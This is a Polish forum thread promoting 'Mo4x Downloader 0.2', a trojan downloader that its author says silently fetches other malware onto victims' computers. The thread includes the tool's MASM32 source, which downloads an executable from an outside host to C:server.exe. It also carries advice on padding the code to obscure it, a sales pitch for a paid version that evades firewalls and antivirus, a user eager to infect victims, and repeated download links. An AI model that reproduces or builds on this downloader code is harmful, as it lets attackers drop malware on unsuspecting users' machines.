Mo4x Downloader 0.2

[Mo4x]

Mo4x Downloader 0.2 - program typu Trojan Downloader

Już jakiś czas nic nie pisałem... Zatem postanowiłem wypuścić mały projekt...

Opis aplikacji: Jest to trojan pobierający z Internetu inne szkodliwe programy bez wiedzy i zgody użytkownika zainfekowanego komputera. Trojan powstał przy użyciu środowiska programistycznego MASM32 i wygenerowany plik servera zawiera około ~850 bajtów.

Download (Public Version): Download Here

Screen: 1 2

Instukcja: Wypełniasz wszystkie pola i klikasz na przycisk "Generate". Dalej już będziesz chyba wiedział co się z tym robi =]

Strona domowa: http://mo4x.com/

W razie jakichś problemów z programem proszę pisać w tym temacie.

 

[.]

Originally posted by Mo4x
Wersja VIP: Napisz do mnie.

O_O No źródełko tego downloadera jest oszołamiające

.386

.model flat, stdcall

include kernel32.inc

include user32.inc

include url.inc

include urlmon.inc

includelib kernel32.lib

includelib user32.lib

includelib url.lib

includelib urlmon.lib

.data

www byte 'http://mo4x.ovh.org/mnemonix.exe', 0

plik byte 'C:server.exe', 0

.code

start:

invoke DeleteFile, addr plik

Invoke UrlDownloadToFile,0,addr www, addr plik,0,0

invoke ExitProcess, 0

end start

Powiedz jeszcze, że chcesz za wersje VIP kasę to już wogule...
Takie coś można znaleźć w każdym kursie ASM.
Więc nie wiem po co to wypuściłes skoro każdy może sobie sam to skompilować a pozatym 10 na 15 AV to wykryje

Pozdrawiam

 

[d3vil]

. - faktycznie, te źródełka wygladają na proste (pomimo tego że nie umiem/nie przepadam za ASMem), jednak znajdują się na tym forum osobniki nie umiejące skonfigurować trojanów, albo nawet nie wiedzące co zrobić po wygenerowaniu servera.
btw. zmień sobie nick na jakiś lepszy

mo4x: pomimo tego, może to być świętny downloader

 

[Mo4x]

Powiedz jeszcze, że chcesz za wersje VIP kasę to już wogule...[/b]

Nie widziałeś kodu wersji VIP to się nie odzywaj, to jest wersja publiczna.
Skąd wiesz np. że w VIP nie dodam omijania wszystkich Firewall'i, zabijania AV i relokacji kodu?! =]

źródełko tego downloadera jest oszołamiające[/b]

To zmień sobie wysokopoziomowe intrukcje "Invoke" na "Call" i już będzie dłuższy kod.
A jak Ci jeszcze mało i jak chcesz mieć bardziej zagmatwane to możesz sobie tam gdzieś w kodzie pododawać coś ;]

Np. Wklej sobie to do kodu:

mov ax, 1

mov cx, 2

xor ax, ax

xor cx,cx

mov eax, 2

mov ecx, 3

add eax, ecx

xor eax, eax

xor ecx, ecx

Push 5

Call Sleep

mov bx, 3

dec bx

xor bx

A jeżeli jeszcze Ci mało, możesz sobie to jeszcze bardziej zagmatwać =]
Ale to już jest w Twoim interesie, ja nie mam czasu na takie rzeczy :mruga:

 

[SZKOD[nick]]

a zamiast tych mov nie powinny być mvi ?
(od razu mówie: nie znam asm)

 

[Mo4x]

Originally posted by SZKOD[nick
]a zamiast tych mov nie powinny być mvi ?

mov rejestr, rejestr/pamiec/stala

Jest to instrukcja assemblera, która kopiuje wartość rejestru, komórki pamięci czy stałej do innego rejestru.

mov ax, 6

Czyli w rejestrze ax będzie 6.

mov ax, cx

A teraz w rejestrze ax będzie to co w rejestrze cx.

Czyli to "mov" jest dobre. Ja myśle =]

A tutaj fragment z pewnej książki:

● MVI (Move Immediate) – przenieś natychmiastowe

Format:
opcode adres, bajtPage 3

Instrukcja MVI
● Cztery sposoby na podanie bajtu natychmiastowego:
– Znakowo: MVI ADRES, C'$'
– Szesnastkowo: MVI ADRES, X'5B'
– Binarnie: MVI ADRES, B'01011011'
– Dziesiętnie: MVI ADRES, 91
● Nie używaj znaku “=”.

Nigdy nie używałem tej instrukcji, asm'a nie znam bardzo dobrze, ale z powyższego opisu wynika, że można użyć też "mvi" chyba.

 

[MeGa.XaKsIoR]

chodzi o to ze ten programik bedzie syfił innymi wirusami kompa ofiary ??

jezeli tak to dla mnie BOMBA :]
program przeznacozyn dla mega haxiorow jak ja :]
pozdro


ale jedno mnie dziwi skad on sciaga te wszystkie wirsuy mam mu podac link czy jak??

 

[M1ch00]

Originally posted by MeGa.XaKsIoR
program przeznacozyn dla mega haxiorow jak ja :]

Miszczu, kiedy ódzielasz nałók?

ale jedno mnie dziwi skad on sciaga te wszystkie wirsuy mam mu podac link czy jak??[/b]

Nie, on je sam pisze, potem pobiera masm'a i je kompiluje.

 

[nBD]

no, to kaspersky juz to wykrywa.mala sugestia: zamiast tworzenia pliku asm i kompilowania go czy nie lepiej przechowywac skompilowany plik (server.exe) w pliku aplikacji i do niego zapisywac dane (adres www,nazwa pliku) i dopiero na dysk ? bo zamiast 4 megowego rara mogles wypuscic jeden plik .asm z downloaderem, na to samo by wyszlo.

 

[M1ch00]

Ten rar ma 4 mega z powodu masy grafiki w konfiguratorze, oraz dołączenia kilku bibliotek. Jakby edytor był konsolowy/napisany w asmie okienkowy, ale bez obrazków to byś miał 15kb całości po wypakowaniu.

 

[Mo4x]

Originally posted by MeGa.XaKsIoR
chodzi o to ze ten programik bedzie syfił innymi wirusami kompa ofiary ??

ale jedno mnie dziwi skad on sciaga te wszystkie wirsuy mam mu podac link czy jak??

Podajesz linka do pliku który ma ściągnąć program i ustawiasz w "Run exe after D-load" czy program ma być uruchomiony po ściągnięciu.

 

[fl3a]

To ma byc PoC?

 

[Mo4x]

Originally posted by fl3a
To ma byc PoC?

:ups: Raczej to nie jest wersja Proof Of Concept =]
Na początku opublikowałem wersje PoC to zainteresowanie programem było zerowe.
Wersja PoC polegała na pokazywaniu komunikatu o treści: "Uruchomiłeś Mo4x Downloader... może być nieciekawie..." przy odpaleniu downloadera.

A i jeszcze coś... przedstawie reakcję pewnego gościa na tą wersje PoC...

4xxxxxx
czesc

Mo4x
hey!

4xxxxxx
Dlaczego gdy odbpalam M4ox Downloader pokazuje sie jakies glupie msg?

Mo4x
Bo to jest wersja PoC.

4xxxxxx
Jaka?!

Mo4x
Proof Of Concept, poszukaj sobie co to jest.

4xxxxxx
eee, chcedsz tylko slawy, ze jak ktos odpali sewer mo4x downloadera, zeby wiedzial ze zostal shaxorowany przez moaxa.

Mo4x
:- To msg jest po to, zeby nie uzyc programu w zlym celu, on ma tylko pokazac dzialanie...

4xxxxxx
Gowno prawda!!!!!!!!!!!!

Mo4x
Jak sobie chcesz...[/b]

 

[fl3a]

Programik ladnie wyglada wizualnie i tyle... Myslalem ze te 800 bajtow uzyskales przez usuwanie zbednych struktur z pliku. Milo by bylo zobaczyc PoC'a bez FSG np. z relokowalnym kodzikiem lub czyms innym rownie ciekawym. Bo wiadomo ze masm normalnie wygeneruje 1kb binarke. Cos kiepsko z Asmem zagrywasz

Moze skusisz(cie) sie na male wyzwanie Ukryc ale skuteczniej!? Jezyk dowolny ale najchetniej RE bym cos w Asmie lub C

Ide na latwizne :faja:

 

[Bi3gan]

@mo4x

Zawsze mowilem, przerost formy nad trescia

.

 

[SZKOD[nick]]

Sporo po czasie, ale miałem na myśli to, że MVI używa się do wpisywania gdzieś jakiejś wartości z nieba, a MOV do pobierania jej skądś i wniesienia gdzie indziej... Takie mam zboczenie po ľP 8085 na którym się troche bawiłem : ) Więc żeby jakieś liczby wpisywać za pomocą MOV, musiałem najpierw je gdzieś zapisywać. tyle

 

[yras]

reupload plx

 

[Nug]

Originally posted by yras
reupload plx

http://mo4x.com/projects/mo4x_downloader/mo4x_downloader_02.zip

;]